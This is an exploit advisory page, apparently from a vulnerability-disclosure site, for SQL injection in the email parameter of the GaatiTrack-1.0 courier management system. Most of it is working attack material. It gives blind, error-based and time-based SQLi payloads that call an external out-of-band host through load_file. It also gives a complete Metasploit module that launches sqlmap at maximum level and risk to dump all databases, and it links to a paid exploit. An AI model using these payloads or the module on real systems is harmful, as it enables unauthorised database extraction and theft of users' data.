GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module

2025.10.07
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: GaatiTrack-1.0 Copyright©2025-Multiple-SQLi - Metasploit module # Author: nu11secur1ty # Date: 10/06/2025 # Vendor: https://www.mayurik.com/ # Software: https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. STATUS: HIGH-CRITICAL Vulnerability [+]Payload: - SQLi: ```SQLi --- Parameter: email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION SELECT 5005) END))-- -&password=r5I!g0t!W9 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 5507 FROM(SELECT COUNT(*),CONCAT('qkqqq',(SELECT (ELT(5507=5507,1))),'qxxpq',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- YcNj&password=r5I!g0t!W9 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=cnbkCuPP@burpcollaborator.net'+(select load_file('\\\\geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\okf'))+'' AND (SELECT 2855 FROM (SELECT(SLEEP(11)))jpbI)-- jtuB&password=r5I!g0t!W9 --- ``` [+]MSF exploit: ```rb ## # gaati.rb # # Author: nu11secur1ty # Description: gaati-sqli ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( 'Name' => 'gaati', 'Description' => 'gaati-sqli', 'Author' => ['nu11secur1ty'], 'License' => MSF_LICENSE ) register_options( [ OptString.new('RAW_REQUEST', [ true, 'Raw HTTP request (from Burp)', '' ]), OptString.new('SQLMAP_PATH', [ false, 'Full path to sqlmap.py', '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' ]) ] ) end def run raw_request = datastore['RAW_REQUEST'] sqlmap_path = datastore['SQLMAP_PATH'] || '/home/kali/sqlmap-nu11secur1ty/sqlmap.py' if raw_request.nil? || raw_request.empty? print_error("RAW_REQUEST is empty — will attempt to use system exploit.txt if present.") end # Prefer system exploit.txt in MSF module dir (no need to cat) system_exploit = '/usr/share/metasploit-framework/modules/auxiliary/MSF/exploit.txt' use_file = nil if File.exist?(system_exploit) use_file = system_exploit print_good("Using existing exploit file: #{use_file}") else # fallback: write to user-writable home dir exploit_dir = File.join(Dir.home, ".msf_exploits") Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir) timestamp = Time.now.strftime("%Y%m%d%H%M%S") tmp_file = File.join(exploit_dir, "exploit_#{timestamp}.txt") if raw_request.nil? || raw_request.empty? print_error("No RAW_REQUEST provided and no system exploit.txt found — nothing to do.") return end begin File.open(tmp_file, "w") { |f| f.write(raw_request) } print_good("Saved RAW_REQUEST -> #{tmp_file}") use_file = tmp_file rescue Errno::EACCES => e print_error("Cannot write temp exploit file: #{e}") return rescue => e print_error("Failed to save temp request: #{e}") return end end unless File.exist?(sqlmap_path) print_error("sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH option to correct path.") # do not delete the temp file so user can inspect return end sqlmap_cmd = [ "python3", sqlmap_path, "-r", use_file, "--no-cast", "--no-escape", "--dbms=mysql", "--time-sec=11", "--random-agent", "--level=5", "--risk=3", "--batch", "--flush-session", "--technique=TBEUSQ", "--union-char=UCHAR", '--answers="crack=Y,dict=Y,continue=Y,quit=N"', "--dump-all" ].join(" ") print_status("Executing sqlmap: #{sqlmap_cmd}") begin system(sqlmap_cmd) print_good("sqlmap finished (check output above)") rescue => e print_error("Failed to execute sqlmap: #{e}") ensure # delete tmp file if we created it if use_file != system_exploit begin File.delete(use_file) if File.exist?(use_file) print_status("Deleted temporary file #{use_file}") rescue => e print_warning("Could not delete temporary file: #{e}") end end end end end ``` # Reproduce: [href](https://www.patreon.com/posts/gaatitrack-1-0-140566642) # Buy an exploit only: [href](https://www.patreon.com/posts/gaatitrack-1-0-140566642) # Time spent: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top